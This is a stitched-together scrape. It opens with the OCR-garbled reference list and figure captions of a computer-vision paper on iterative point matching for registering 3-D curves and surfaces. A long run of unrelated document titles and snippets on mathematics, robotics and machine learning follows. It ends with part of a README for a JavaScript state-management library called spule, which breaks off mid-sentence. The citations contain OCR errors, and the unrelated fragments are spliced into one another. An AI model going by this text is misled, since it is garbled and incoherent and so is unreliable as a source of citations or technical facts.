Lavall6e, S., Szeliski, R. and Brunie, L.: 1992, From accurate range imaging sensor calibration to accurate model-based 3-1) object localization, Proc. IEEE Conf. Comput. Vision Pattern Recog., Champaign, Illinois, pp Chen, X.: 1992, Vision-Based Geometric Modeling, Ph.D. dissertation, Ecole Nationale Sup~rieure des T~.16communications, Paris, France. Chen, Y. and Medioni, G.: 1992, Object modelling by registration of multiple range images, Image and Vision Computing 10(3), Chin, R. and Dyer, C.: 1986, Model-based recognition in robot vision, A CM Computing Surveys 18(1 ), Faugeras, O. and Hebert, M.: 1986, The representation, recognition, and locating of 3D shapes from range data, lnt'l J. Robotics Res. 5(3), Faugeras, O. D.~ Lebras-Mehlman, E. and Boissonnat, J.: 1990, Representing Stereo data with the Delaunay Triangulation, Artif lntell. Faugeras, O., Fua, P., Hotz, B., Ma, R., Robert, L., Thonnat, M. and Zhang, Z.: 1992, Quantitative and qualitative comparison of some area and feature-based stereo algorithms, in W. FOstner and S. Ruwiedel (eds), Robust Computer Vision: Quality of Vis&n Algorithms, Wichmann, Karlsruhe, Germany, pp Fua, P.: t992, A parallel stereo algorithm that produces dense depth maps and preserves image features, Machine Vision and Applications. Accepted for publication. Gennery, D. B.: 1989, Visual terrain matching for a Mars rover, Proc. IEEE Cor~ Comput. Vision Pattern Recog., San Diego, CA, pp Goldgof, D. B., Huang, T. S. and Lee, H.: 1988, Feature extraction and terrain matching, Proc. IEEE Conf. Comput. Vision Pattern Recog., Ann Arbor, Michigan, pp Grimson, W.: t985, Computational experiments with a feature based stereo algorithm, IEEE Trans. PAMI 7(1), Gueziec, A. and Ayache, N.: 1992, Smoothing and matching of 3-D space curves, Proc. Second European Co~f Comput. Vision, Santa Margharita Ligure, Italy, pp Haralick, R. et al.: 1989, Pose estimation from corresponding point data, IEEE Trans. SMC 19(6), Hebert, M., Caillas, C., Krotkov, E., Kweon, I. S. and Kanade, T.: 1989, Terrain mapping for a roving planetary explorer, Proc. lnt'l Conf. Robotics Automation, pp Horn, B.: 1987, Closed-form solution of absolute orientation using unit quaternions, Journal of the Optical Society of America A 7, Horn, B. and Harris, J.: 199 I, Rigid body motion from range image sequences, CVGIP: Image Understanding 53(1), Kamgar-Parsi, B., Jones, J. L. and Rosenfeld, A.: t991, Registration of multiple overlapping range images: Scenes without distinctive features, IEEE Trans. PAMI 13(9), Kehtamavaz, N. and Mohan, S.: 1989, A framework for estimation of motion parameters from range images, Comput. Vision, Graphics Image Process. 45, Kriegman, D., Triendl, E. and Binford, T.: 1989, Stereo vision and navigation in buildings for mobile robots, IEEE Trans. RA 5(6), Kweon, I. and Kanade, T.: 1992, High-resolution terrain map from multiple sensor data, IEEE Trans. PAMI 14(2), Liang, P. and Todhunter, J. S.: 1990, Representation and recognition of surface shapes in range images: A differential geometry approach, Comput. Vision, Graphics Image Process. 52, Matthies, L, and Shafer, S. A.: 1987, Error modeling in stereo navigation, IEEE J. tea 3(3), Mayhew, J. E. W. and Frisby, J. P.: 1981, Psychophysical and computational studies towards a theory of human stereopsis, Artif lntell 17, Menq, C.-H., Yau, H.-T. and Lai, G.-Y.: 1992, Automated precision measurement of surface profile in CAD-directed inspection, IEEE Trans. RA 8(2), Milios, E. E.: 1989, Shape matching using curvature processes, Comput. Vision, Graphics Image Process. 47, Navab, N. and Zhang, Z.: 1992, From multiple objects motion analysis to behavior-based object recognition, Proc. ECAI 92, Vienna, Austria, pp Pavlidis, T.: 1980, Algorithms for shape analysis of contours and waveforms, IEEE Trans. PAMI 2(4), Pollard, S, Mayhew, J. and Frisby, J.: 1985, PMF: A stereo correspondence algorithm using a disparity gradient limit, Perception 14, Preparata, F. and Shamos, M.: t986, Computational Geometry, An tntrodaction, Springer, Berlin, Heidelberg, New-York. Radack, G. M. and Badler, N. I.: 1989, Local matching of surfaces using a boundary-centered radial decomposition, Comput. Vision, Graphics hnage Process. 45, Robert, L. and Faugeras, O.: 1991, Curve-based stereo: Figural continuity and curvature, Proc. IEEE Conf Comput. Vision Pattern Recog., Maul, Hawaii, pp Rodrfguez, J', J. and Aggarwal, J. K.: 1989, Navigation using image sequence analysis and 3-D terrain matching, Proc. Workshop on Interpretation of 3D Scenes, Austin, TX, pp Safaee-Rad, R., Tcboukanov, I., Benhabib, B. and Smith, K. C.: 1991, Accurate parameter estimation of quadratic curves from grey-level images, CVGIP: Image Understanding 54(2), Sampson, R. E.: 1987, 3D range sensor-phase shift detection, Computer 20, Schwartz, J. T. and Sharir, M.: 1987, Identification of partially obscured objects in two and three dimensions by matching noisy characteristic curves, Int'l J. Robotics Res. 6(2), Szetiski, R.: 1988, Estimating motion from sparse range data without correspondence, Proc. Second Int'l Conf. Comput. Vision, IEEE, Tampa, FL, pp Szeliski, R.: 1990, Bayesian modeling of uncertainty in low-level vision, lnt'l J. Comput. Vision 5(3), 27t-301. Taubin, G.: 1991, Estimation of planar curves, surfaces, and nonplanar space curves defined by implicit equations with applications to edge and range image segmentation, IEEE Trans. PAM1 13(t 1), 1lt Walker, M. W., Shao, L. and Volz, R. A.: 1991, Estimating 3-D location parameters using dual number quaternions, CVGIP: Image Understanding 54(3), 30 148 Zhang Waiters, D.: 1987, Selection of image primitives for generalpurpose visual processing, Comput. Vision, Graphics Image Process. 37(3), Wolfson, H.: 1990, On curve matching, IEEE Trans. PAMI 12(5), Zhang, Z.: 1991, Recalage de deux cartes de protbndeur denses: L'rtat de I'art, Rapport VAP de la phase 4, CNES, Toulouse, France. Zhang, Z.: 1992a, Iterative point matching for registration of freeform curves, Research Report 1658, INRIA Sophia-Antipolis. Zhang, Z.: t992b, On local matching of free-form curves, Proc. British Machine Vision Conf., University of Leeds, UK, pp Zhang, Z. and Faugeras, O.: 1991, Determining motion from 3D line segments: A comparative study, Image and Vision Computing 9(1), Zhang, Z. and Faugeras, O.: 1992a, 3D Dynamic Scene Analysis: A Stereo BasedApproach, Springer, Berlin, Heidelberg. Zhang, Z. and Faugeras, O.: 1992b, Three-dimensional motion computation and object segmentation in a long sequence of stereo frames, lnt'l J. Comput. Vision 7(3), Zhang, Z., Faugeras, O. and Ayache, N.: 1988, Analysis of a sequence of stereo scenes containing multiple moving objects using rigidity constraints, Proc. Second lnt'l Conf. Comput. Vision, Tampa, FL, pp Also as a chapter in R. Kasturi and R.C. Jain (eds), Computer Vision: Principles, IEEE computer society press, 1991. 31 Iterative Point Matching for Registration of Free-Form Curves and Surfaces Color Figures Fig. 21. Superposition of the two 3-D maps of a rock scene after a manual registration: front and top views Fig. 22. Test 1: Superposition of two 3-D maps before registration: front and top views 149 32 150 Zhang Fig. 23. Test 1: Superposition of two 3-D maps after registration: front and top views Fig. 24. Test 2: Superposition of two 3-D maps before registration: front and top views 33 Iterative Point Matching jbr Registration of Free-Form Curves and Surfaces Fig. 25. Test 2: Superposition of two 3-D maps after 40 iterations: front and top views Fig. 26. Test 2: Superposition of two 3-D maps after 80 iterations: front and top views 151 34 152 Zhang Fig. 27. Test 3: Superposition of two 3-D maps before registration: front and top views Fig. 28. Test 3: Superposition of two 3-D maps after registration: front and top views The Trimmed Iterative Closest Point Algorithm Image and Pattern Analysis (IPAN) Group Computer and Automation Research Institute, HAS Budapest, Hungary The Trimmed Iterative Closest Point Algorithm Dmitry Chetverikov and Dmitry Stepan Part-Based Recognition Part-Based Recognition Benedict Brown CS597D, Fall 2003 Princeton University CS 597D, Part-Based Recognition p. 1/32 Introduction Many objects are made up of parts It s presumably easier to identify Solving Simultaneous Equations and Matrices Solving Simultaneous Equations and Matrices The following represents a systematic investigation for the steps used to solve two simultaneous linear equations in two unknowns. The motivation for TO NEURAL NETWORKS INTRODUCTION TO NEURAL NETWORKS Pictures are taken from By Nobel Khandaker Neural Networks Chapter 6: The Information Function 129. CHAPTER 7 Test Calibration Chapter 6: The Information Function 129 CHAPTER 7 Test Calibration 130 Chapter 7: Test Calibration CHAPTER 7 Test Calibration For didactic purposes, all of the preceding chapters have assumed that the Face detection is a process of localizing and extracting the face region from the Chapter 4 FACE NORMALIZATION 4.1 INTRODUCTION Face detection is a process of localizing and extracting the face region from the background. The detected face varies in rotation, brightness, size, etc. Path Tracking for a Miniature Robot Path Tracking for a Miniature Robot By Martin Lundgren Excerpt from Master s thesis 003 Supervisor: Thomas Hellström Department of Computing Science Umeå University Sweden 1 Path Tracking Path tracking Epipolar Geometry Calibration Methods Further Readings. Stereo Camera Calibration Stereo Camera Calibration Stereo Camera Calibration Stereo Camera Calibration Stereo Camera Calibration 12.10.2004 Overview Introduction Summary / Motivation Depth Perception Ambiguity of Correspondence Algebra 2 Chapter 1 Vocabulary. identity - A statement that equates two equivalent expressions. Chapter 1 Vocabulary identity - A statement that equates two equivalent expressions. verbal model- A word equation that represents a real-life problem. algebraic expression - An expression with variables. Linear Threshold Units Linear Threshold Units w x hx (... w n x n w We assume that each feature x j and each weight w j is a real number (we will relax this later) We will study three different algorithms for learning linear NEW YORK STATE TEACHER CERTIFICATION EXAMINATIONS NEW YORK STATE TEACHER CERTIFICATION EXAMINATIONS TEST DESIGN AND FRAMEWORK September 2014 Authorized for Distribution by the New York State Education Department This test design and framework document Constrained curve and surface fitting Constrained curve and surface fitting Simon Flöry FSP-Meeting Strobl (June 20, 2006), floery@geoemtrie.tuwien.ac.at, Vienna University of Technology Overview Introduction Motivation, Overview, Problem, EFFICIENT VEHICLE TRACKING AND CLASSIFICATION FOR AN AUTOMATED TRAFFIC SURVEILLANCE SYSTEM EFFICIENT VEHICLE TRACKING AND CLASSIFICATION FOR AN AUTOMATED TRAFFIC SURVEILLANCE SYSTEM Amol Ambardekar, Mircea Nicolescu, and George Bebis Department of Computer Science and Engineering University The calibration problem was discussed in details during lecture 3. 1 2 The calibration problem was discussed in details during lecture 3. 3 Once the camera is calibrated (intrinsics are known) and the transformation from the world reference system to the camera reference Experiment #1, Analyze Data using Excel, Calculator and Graphs. Physics 182 - Fall 2014 - Experiment #1 1 Experiment #1, Analyze Data using Excel, Calculator and Graphs. 1 Purpose (5 Points, Including Title. Points apply to your lab report.) Before we start measuring Linear Codes. Chapter 3. 3.1 Basics Chapter 3 Linear Codes In order to define codes that we can encode and decode efficiently, we add more structure to the codespace. We shall be mainly interested in linear codes. A linear code of length Problem definition: optical flow Motion Estimation Why estimate motion? Lots of uses Track object behavior Correct Metrics on SO(3) and Inverse Kinematics Mathematical Foundations of Computer Graphics and Vision Metrics on SO(3) and Inverse Kinematics Luca Ballan Institute of Visual Computing Optimization on Manifolds Descent approach d is a ascent direction Whiteboard It! Convert Whiteboard Content into an Electronic Document Whiteboard It! Convert Whiteboard Content into an Electronic Document Zhengyou Zhang Li-wei He Microsoft Research Email: zhang@microsoft.com, lhe@microsoft.com Aug. 12, 2002 Abstract This ongoing project PATTERN RECOGNITION AND MACHINE LEARNING CHAPTER 4: LINEAR MODELS FOR CLASSIFICATION PATTERN RECOGNITION AND MACHINE LEARNING CHAPTER 4: LINEAR MODELS FOR CLASSIFICATION Introduction In the previous chapter, we explored a class of regression models having particularly simple analytical Nonlinear Iterative Partial Least Squares Method Numerical Methods for Determining Principal Component Analysis Abstract Factors Béchu, S., Richard-Plouet, M., Fernandez, V., Walton, J., and Fairley, N. (2016) Developments in numerical treatments for Simultaneous Gamma Correction and Registration in the Frequency Domain Simultaneous Gamma Correction and Registration in the Frequency Domain Alexander Wong a28wong@uwaterloo.ca William Bishop wdbishop@uwaterloo.ca Department of Electrical and Computer Current Standard: Mathematical Concepts and Applications Shape, Space, and Measurement- Primary Shape, Space, and Measurement- Primary A student shall apply concepts of shape, space, and measurement to solve problems involving two- and three-dimensional shapes by demonstrating an understanding of: Classification of Fingerprints. Sarat C. Dass Department of Statistics & Probability Classification of Fingerprints Sarat C. Dass Department of Statistics & Probability Fingerprint Classification Fingerprint classification is a coarse level partitioning of a fingerprint database into smaller CHAPTER 6 TEXTURE ANIMATION CHAPTER 6 TEXTURE ANIMATION 6.1. INTRODUCTION Animation is the creating of a timed sequence or series of graphic images or frames together to give the appearance of continuous movement. A collection of Two-Frame Motion Estimation Based on Polynomial Expansion Two-Frame Motion Estimation Based on Polynomial Expansion Gunnar Farnebäck Computer Vision Laboratory, Linköping University, SE-581 83 Linköping, Sweden gf@isy.liu.se Abstract. The accurate calibration of all detectors is crucial for the subsequent data Chapter 4 Calibration The accurate calibration of all detectors is crucial for the subsequent data analysis. The stability of the gain and offset for energy and time calibration of all detectors involved, Environmental Remote Sensing GEOG 2021 Environmental Remote Sensing GEOG 2021 Lecture 4 Image classification 2 Purpose categorising data data abstraction / simplification data interpretation mapping for land cover mapping use land cover class OBJECT TRACKING USING LOG-POLAR TRANSFORMATION OBJECT TRACKING USING LOG-POLAR TRANSFORMATION A Thesis Submitted to the Gradual Faculty of the Louisiana State University and Agricultural and Mechanical College in partial fulfillment of the Efficient Pose Clustering Using a Randomized Algorithm International Journal of Computer Vision 23(2), 131 147 (1997) c 1997 Kluwer Academic Publishers. Manufactured in The Netherlands. Efficient Pose Clustering Using a Randomized Algorithm CLARK F. OLSON MA 323 Geometric Modelling Course Notes: Day 02 Model Construction Problem MA 323 Geometric Modelling Course Notes: Day 02 Model Construction Problem David L. Finn November 30th, 2004 In the next few days, we will introduce some of the basic problems in geometric modelling, and VELOCITY, ACCELERATION, FORCE VELOCITY, ACCELERATION, FORCE velocity Velocity v is a vector, with units of meters per second ( m s ). Velocity indicates the rate of change of the object s position ( r ); i.e., velocity tells you how Improved Billboard Clouds for Extreme Model Simplification Improved Billboard Clouds for Extreme Model Simplification I.-T. Huang, K. L. Novins and B. C. Wünsche Graphics Group, Department of Computer Science, University of Auckland, Private Bag 92019, Auckland, 2. Simple Linear Regression Research methods - II 3 2. Simple Linear Regression Simple linear regression is a technique in parametric statistics that is commonly used for analyzing mean response of a variable Y which changes according Prentice Hall Mathematics: Algebra 1 2007 Correlated to: Michigan Merit Curriculum for Algebra 1 STRAND 1: QUANTITATIVE LITERACY AND LOGIC STANDARD L1: REASONING ABOUT NUMBERS, SYSTEMS, AND QUANTITATIVE SITUATIONS Based on their knowledge of the properties of arithmetic, students understand and reason Gradient Methods. Rafael E. Banchs Gradient Methods Rafael E. Banchs INTRODUCTION This report discuss one class of the local search algorithms to be used in the inverse modeling of the time harmonic field electric logging problem, the Gradient More Local Structure Information for Make-Model Recognition More Local Structure Information for Make-Model Recognition David Anthony Torres Dept. of Computer Science The University of California at San Diego La Jolla, CA 9093 Abstract An object classification discuss how to describe points, lines and planes in 3 space. Chapter 2 3 Space: lines and planes In this chapter we discuss how to describe points, lines and planes in 3 space. introduce the language of vectors. discuss various matters concerning the relative position Solutions to old Exam 1 problems Solutions to old Exam 1 problems Hi students! I am putting this old version of my review for the first midterm review, place and time to be announced. Check for updates on the web site as to which sections Robot Manipulators. Position, Orientation and Coordinate Transformations. Fig. 1: Programmable Universal Manipulator Arm (PUMA) Robot Manipulators Position, Orientation and Coordinate Transformations Fig. 1: Programmable Universal Manipulator Arm (PUMA) A robot manipulator is an electronically controlled mechanism, consisting Bachelor Graduation Project SOLVING JIGSAW PUZZLES USING COMPUTER VISION SOLVING JIGSAW PUZZLES USING COMPUTER VISION AUTHOR : AREEJ MAHDI SUPERVISOR : REIN VAN DEN BOOMGAARD DATE : JUNE 22, 2005 SIGNED BY : Bachelor Graduation Project Solving Jigsaw Puzzles Using Computer:! Approximation Algorithms Approximation Algorithms or: How I Learned to Stop Worrying and Deal with NP-Completeness Ong Jit Sheng, Jonathan (A0073924B) March, 2012 Overview Key Results (I) General techniques: Greedy algorithms Section 1.1. Introduction to R n The Calculus of Functions of Several Variables Section. Introduction to R n Calculus is the study of functional relationships and how related quantities change with each other. In your first exposure to Jiří Matas. Hough Transform Hough Transform Jiří Matas Center for Machine Perception Department of Cybernetics, Faculty of Electrical Engineering Czech Technical University, Prague Many slides thanks to Kristen Grauman and Bastian NEW MEXICO Grade 6 MATHEMATICS STANDARDS PROCESS STANDARDS To help New Mexico students achieve the Content Standards enumerated below, teachers are encouraged to base instruction on the following Process Standards: Problem Solving Build new mathematical Robot Perception Continued Robot Perception Continued 1 Visual Perception Visual Odometry Reconstruction Recognition CS 685 11 Range Sensing strategies Active range sensors Ultrasound Laser range sensor Slides adopted from Siegwart Calculus C/Multivariate Calculus Advanced Placement G/T Essential Curriculum Calculus C/Multivariate Calculus Advanced Placement G/T Essential Curriculum UNIT I: The Hyperbolic Functions basic calculus concepts, including techniques for curve sketching, exponential and logarithmic SPECIAL PERTURBATIONS UNCORRELATED TRACK PROCESSING AAS 07-228 SPECIAL PERTURBATIONS UNCORRELATED TRACK PROCESSING INTRODUCTION James G. Miller * Two historical uncorrelated track (UCT) processing approaches have been employed using general perturbations PCHS ALGEBRA PLACEMENT TEST MATHEMATICS Students must pass all math courses with a C or better to advance to the next math level. Only classes passed with a C or better will count towards meeting college entrance requirements.
http://docplayer.net/280785-Iterative-point-matching-for-registration-of-free-form-curves-and-surfaces.html
CC-MAIN-2018-09
refinedweb
18,350
55.24
Created on 2010-03-02 21:26 by Matt.Gattis, last changed 2010-08-02 16:49 by pitrou. This issue is now closed. If you do: import io,mmap b = io.BytesIO("abc") m = mmap.mmap(-1,10) m.seek(5) b.readinto(m) M is now: 'abc\x00\x00\x00\x00\x00\x00\x00' Basically there is no way to readinto/recv_into an arbitary position in an mmap object without creating a middle-man string. If you want to slice into a writable buffer, you can use a memoryview: >>> b = io.BytesIO(b"abc") >>> m = mmap.mmap(-1, 10) >>> b.readinto(memoryview(m)[5:]) 3 >>> m[:] b'\x00\x00\x00\x00\x00abc\x00\x00' This only works on 3.x, though. As for changing the mmap buffer implementation, it would break compatibility and is therefore not acceptable, sorry.
https://bugs.python.org/issue8042
CC-MAIN-2021-25
refinedweb
140
71
(Extra copy to the list, since Google Groups breaks the recipient list :P) inspect.Signature.bind() supports this in Python 3.3+ For earlier versions, Aaron Iles backported the functionality on PyPI as "funcsigs". You can also just define an appropriate function, call it as f(*args, **kwds) and return the resulting locals() namespace. Cheers, Nick. On 19 Sep 2013 04:39, "Neil Girdhar" <mistersheik at gmail.com> wrote: > As far as I know, the way that arguments are mapped to a parameter > specification is not exposed to the programmer. I suggest adding a > PassedArgSpec class having two members: args and kwargs. Then, > inspect.ArgSpec can take an argument specification and decode the > PassedArgSpect (putting the right things in the right places) and return a > dictionary with everything in its right place. > > I can only think of one use for now, which is replacing "arguments" in the > returned tuple of __reduce__ and maybe allowing it to be returned by > "__getnewargs__". It might also be nice to store such argument > specifications instead of the pair args, kwargs when storing them in lists. > > Best, > > Neil > > _______________________________________________ > Python-ideas mailing list > Python-ideas at python.org > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: <>
https://mail.python.org/pipermail/python-ideas/2013-September/023238.html
CC-MAIN-2017-04
refinedweb
201
63.8
Red Hat Bugzilla – Bug 152610 kickstart fails with python errors Last modified: 2007-11-30 17:11:02 EST Description of problem: I have a proven kickstart setup where I install via url method from a local webserver. I dumped the new FC4-1 isos into a diretory to use as the install base. The system boots and attempts to run anaconda, but falls on its face before doing anything meaningful. How reproducible: Boot the boot.iso in the FC4-1 images directory of the CDs. Steps to Reproduce: 1.Boot to a kickstart that references FC4-1. Actual results: The output on the screen looks something like this: Running anaconda, the Fedora Core system installer - please wait... Could not find platform independant libraries <prefix> Consider setting $PYTHONHOME to <prefix>[:<exec_prefix>] 'import site' failed; use -v for traceback Traceback (most recent call last): File "/usr/bin/anaconda", line 28, in ? import sys, os Import Error: No module named os install exited abnormally sending termination signals...done sending kill signals...done ...it halts (but doesn't power off) after this point... Expected results: System install based on the kickstart file. Additional info: Created attachment 112472 [details] file list This is a list of files in the directory that I am pointing kickstart at. Created attachment 112473 [details] file list (sorted) sorted version of previous attachment *** This bug has been marked as a duplicate of 147507 *** This should be fixed in test2 Jeremy, this exact error message is back for me with boot.iso and linux text for ftp install. (minstg2.img 2006-02-07 7:16- 24,264,704B) (HP omnibook 4150 384Mram). F3 ... looking for USB mouse... Running anaconda script /usr/bin/anaconda F4 ... <6>SGI XFS Quota Management subsystem <6>device-mapper: 4.5.0-ioctl (2005-10-04) initialised: dm-devel@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=152610
CC-MAIN-2017-09
refinedweb
305
58.38
Just a few quick updates: 1) Looks like the Castor article is going to a webzine rather than the website. I'll let you know... 2) Made some progress on PUNT, which is a set of filters for converting Namespace prefixes in XML to encoded URIs. Results in real ugly documents, but it may be a useful tool for those still operating in namespace-unaware environs (or where namespaces are just handled badly by some third-party joker who won't listen to you). 3) Thinking more about a typed metalanguage (TML) that is backwards compatible with XML. I've had a couple of interesting debates with people on xml-dev of late. For instance, Simon St. Laurent's a big fan of loose constraints, lexically specified, whereas I'm more the semanticly-undestood datatypes advocate. The twain have to meet somewhere, though. Further exploration of the TML concept should help delineate those boundaries. The XML Schema datatypes guys have pointed the way, although they got lost somewhere on the trail, probably attributable to politics and compromise (and deadline pressure). There's something to be said for being a cowboy. Later
http://www.advogato.org/person/jeffalo/diary/5.html
CC-MAIN-2014-15
refinedweb
191
64.61
I currently have thirteen buttons hooked up to two digital pins (0,1) on a Teensy 3.2 through two 74HC4051 muxes. The Muxes are controled by pins 10,11,12. MUX 1 has eight pushbuttons and MUX 2 five, with the spare pins tied to ground. I am using the midicontroller.h library from here: the circuit is essentially the same as the one shown here, but with only two Multiplexers: Some of the buttons are DigitalLatch, some are simple Digital (see code below) Everything is working as it should up to a point. However the DigitalLatch buttons on Pin 7 and Pin 3 of MUX 1 seem to alternate between firing the two MIDI notes assigned to these pins at a very fast rate when either button is pushed. After much playing around, I am wondering if this might be an issue with the S2 control pin getting current even when it is nominally "low", causing the read to flicker between these pins? as per the datasheet, this is the difference between reading pin 7 and pin 3 If this is the case what can I do to solve this? I read someone suggesting tying the control pins to ground via a high value resisitor might help. Is this a possible solution? I have already re-soldered the control pin connections, and tried replacement buttons, and also tried moving the buttons on MUX 2 to different pins. One interesting result here was that removing the button from pin 7 and moving it to pin 4 of the mux seemed to cause the button on pin 6 to exhibit the same behavior. Something even stranger seems to happen on the other Multiplexer - On Pin7 of Mux 2 the Digital button appears to trigger MIDI note 16, as well as 12 (which it is allocated)..... and it triggers both again at a very fast repeat, rather than held note. I am sort of hoping solving the first problem will also help with this though! thanks in advance for any advice. Code: #include <Encoder.h> #include <MIDI_Controller.h> //Midi controller library #include <ResponsiveAnalogRead.h> // analog smoothing #include <Bounce.h> // include the Bounce library for 'de-bouncing' switches -- removing electrical chatter as contacts settle // usbMIDI.h library is added automatically when code is compiled as a MIDI device using namespace ExtIO; // use standard arduino digital write pin mode etc. AnalogMultiplex buttonsmux1(1, { 10, 11, 12 } ); AnalogMultiplex buttonsmux2(0, { 10, 11, 12 } ); // creating muxers //AnalogMultiplex(pin_t analogPin, { pin_t addressPin1, addressPin2, ... addressPinN } ) //analogPin: the analog input pin connected to the output of the multiplexer //addressPin#: the digital output pins connected to the address lines of the multiplexer DigitalLatch Arcadebuttons[] = { {buttonsmux1.pin(0), 0, 14, 127, 10}, {buttonsmux1.pin(1), 1, 14, 127, 10}, {buttonsmux1.pin(2), 2, 14, 127, 10}, {buttonsmux1.pin(3), 3, 14, 127, 10}, {buttonsmux1.pin(4), 4, 14, 127, 10}, {buttonsmux1.pin(5), 5, 14, 127, 10}, {buttonsmux1.pin(6), 6, 14, 127, 10}, {buttonsmux1.pin(7), 7, 14, 127, 10}, // Create 8 new instances of the class 'DigitalLatch', on the 8 pins of the buttonsmux }; DigitalLatch Arcadebuttonextras[] = { {buttonsmux2.pin(3), 8, 14, 127, 10}, {buttonsmux2.pin(4), 9, 14, 127, 10}, //extra two arcade buttons }; Digital Navigation[] = { {buttonsmux2.pin(5), 10, 14, 127}, {buttonsmux2.pin(6), 11, 14, 127}, {buttonsmux2.pin(7), 12 , 14, 127}, // Create 3 new instances of the class 'Digital' for navigation buttons, on the 3 pins of the buttonsmux }; //CONSTANT VALUES const static byte Channel_Volume = 0x7; // controller number 7 is defined as Channel Volume in the MIDI implementation. const static size_t analogAverage = 8; // Use the average of 8 samples to get smooth transitions and prevent noise const static byte velocity = 127; // the maximum velocity, since MIDI uses a 7-bit number for velocity. const static int latchTime = 3000; // the amount of time (in ms) the note is held on. Read documentation or see source code for more information. const static byte C4 = 60; // note number 60 is defined as middle C in the MIDI implementation. const static byte E0 = 16; // note number 60 is defined as middle C in the MIDI implementation, so 16 is E0 const byte Channel = 14; // MIDI channel 14 const byte Controller = 0x14; // MIDI controller number const int speedMultiply = 1; // no change in speed of the encoder void setup() { } void loop() { MIDI_Controller.refresh(); }
https://forum.pjrc.com/threads/56523-Triggering-multiple-notes-from-single-button-press-mxltiplexer-74hc4051?s=f9cf5d806126ff871619d26af8093c5e&p=208569&viewfull=1
CC-MAIN-2019-43
refinedweb
722
55.44
Wrapper for the airgram api Project description A python wrapper for making calls to the Airgram API, which enables you to send push notifications to your mobile devices. Since it is a very shallow wrapper, you can refer to the official api reference for details on the functions. Examples At the time of writing (2015-08-20) airgram is using wrong certificates (see), which are intended for herokuapp.com. Because of this cert verification needs to be turned off. Using as a guest from airgram import Airgram ag = Airgram(verify_certs=False) # Send a message to a user ag.send_as_guest("your@email.com", "Test message from Airgram API", "") Using with an authenticated airgram service from airgram import Airgram ag = Airgram(key="MY_SERVICE_KEY", secret="MY_SERVICE_SECRET", verify_certs=False) # Subscribe an email to the service ag.subscribe("your@email.com") # Send a message to a subscriber ag.send("your@email.com", "Hello, how are you?") # Send a message to ALL subscribers ag.broadcast("Airgram for python is awesome", url="") History 0.1.3 (2015-08-25) BugFix - added MANIFEST.in (fix install problem) 0.1.2 (2015-08-21) BugFix - Correct wrong api url 0.1.1 (2015-08-21) - Add module logger - Add class logger - Functions throw AirgramException on failure 0.1.0 (2015-07-30) - First release on PyPI. Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/airgram/
CC-MAIN-2021-10
refinedweb
240
59.6
README spule Spule ~ Scottish: [ˈspül] variant of Spool ~ German: [ˈʃpuːlə] Coil, Reel Introduction: State MGMT and Side-EffectsIntroduction: State MGMT and Side-Effects All too often, state management (MGMT) is an "add-on", an afterthought of a UI/API. However, you may realize by now - if you've spent any significant time using the available MGMT libraries - that state (and coupled effects) is the most infuriating source of complexity and bugs in modern JavaScript apps. Spule aims to be far simpler than the status quo by starting with a simple abstraction over the hardest parts and working outwards to the easier ones. Getting StartedGetting Started npm install spule What if you could compose your app logic on an ad-hoc basis without creating spagetthi code? Yes, it's possible and one of the primary goals of spule At it's core, spule is async-first. It allows you to write your code using async/ await/ Promises in the most painless and composable way you've ever seen. spule does some stream-based (FRP) gymnastics under the hood to correograph everything, however, you won't have to worry about the implementation details. spule aims at being approachable to those who have zero experience with streams. Let's see some examples. CommandsCommands At the core of spule is an async spooler (hence the name), which recieves "Commands" and responds to them. We'll go into more detail later, but let's jump right in with some copy/paste examples. Stupid Command example: // src/genie.js import { run$, registerCMD } from "spule" const GENIE = registerCMD({ sub$: "GENIE", args: "your wish", work: x => console.log("🧞♀️:", x, "is my command") }) // work handler is digested during registration console.log(GENIE) // => { sub$: "GENIE", args: "your wish" } run$.next(GENIE) //=> 🧞♀️: your wish is my command registerCMD takes a config Object, attaches the work callback to a pubsub stream for you and returns a Command Object that you can use to trigger that callback (subscription based on the Command sub$ value). This Object signature is not only handy as a means to manage a lot of Commands, but it also avails spule's superpower: Tasks TasksTasks Tasks, like Commands, are just data (including Lambdas). Commands are Objects and Tasks are Arrays of Commands. This allows them to be dis/reassembled and reused on an ad-hoc basis. Let's compose our GENIE Command with an API call... // src/genie.js (continued) export const GET__FORTUNE = [ // 1st Command args' Object initializes an accumulator { args: { api: "" } }, // lambda args have access to the accumulation { args: ({ api }) => fetch(api).then(r => r.json()), reso: (acc, { fortune }) => ({ fortune }), erro: (acc, err) => ({ error: err }) } ] const FORTUNE__GENIE = [ ...GET__FORTUNE, { ...GENIE, args: ({ fortune }) => fortune } ] run$.next(FORTUNE__GENIE) // => 🧞♀️: Deliver yesterday, code today, think tomorrow. is my command Logic as Data™Logic as Data™ As you can see - within a Task - the only required key on a Command Object is the args key, which provide the signal-passing functionality between intra-Task Commands. The only Command that actually does any work here is GENIE (the one with a registered sub$). 🔍 UTH (Under the Hood): This intra-Task handoff works via an async reducefunction. Any Objectreturned by a Command is spread into an "accumulator" that can be accessed by any following Commands within a Task (via a unary Lambda in the argsposition). Hopefully you get a sense of how handy this is already. Have you ever wished you could pull out and pass around a .then from one Promise chain to compose with another? Well, now you - effectively - can. Not only can you recombine Promises with Tasks, you can also recombine side-effecting code. This is "Logic as Data"™ And, yes, it gets even better. It may be obvious that you can de/compose or spread together Tasks (they're just Arrays). But, what if the shape/signature of your "Subtask" doesn't match that of the Task that you'd like spread it into? SubtasksSubtasks // src/zoltar.js import { run$, registerCMD } from "spule" import { GET__FORTUNE } from "./genie" const ZOLTAR = registerCMD({ sub$: "ZOLTAR", args: { zoltar: "make your wish" }, work: ({ zoltar }) => console.log("🧞♂️:", zoltar) }) const TOM = registerCMD({ sub$: "TOM", args: { tom: "👶: I wish I were big" }, work: ({ tom }) => console.log(tom) }) /** * use a unary function that takes the accumulator * Object and returns a Task */ const ZOLTAR__X = ({ zoltar }) => [ { ...TOM, args: { tom: "🧒: I wish I was small again" } }, { ...ZOLTAR, args: { zoltar } } ] const BIG__MORAL = [ ZOLTAR, TOM, { ...ZOLTAR, args: { zoltar: "your wish is granted" } }, ...GET__FORTUNE, ({ fortune }) => ZOLTAR__X({ zoltar: fortune }) ] run$.next(BIG__MORAL) //=> 🧞♂️: make your wish //=> 👶: I wish I were big //=> 🧞♂️: your wish is granted //=> 🧒: I wish I was small again //=> 🧞♂️: Growing old is mandatory; growing up is optional. Just as using a unary args function in a Command allows passing state between Commands, you can use a unary function 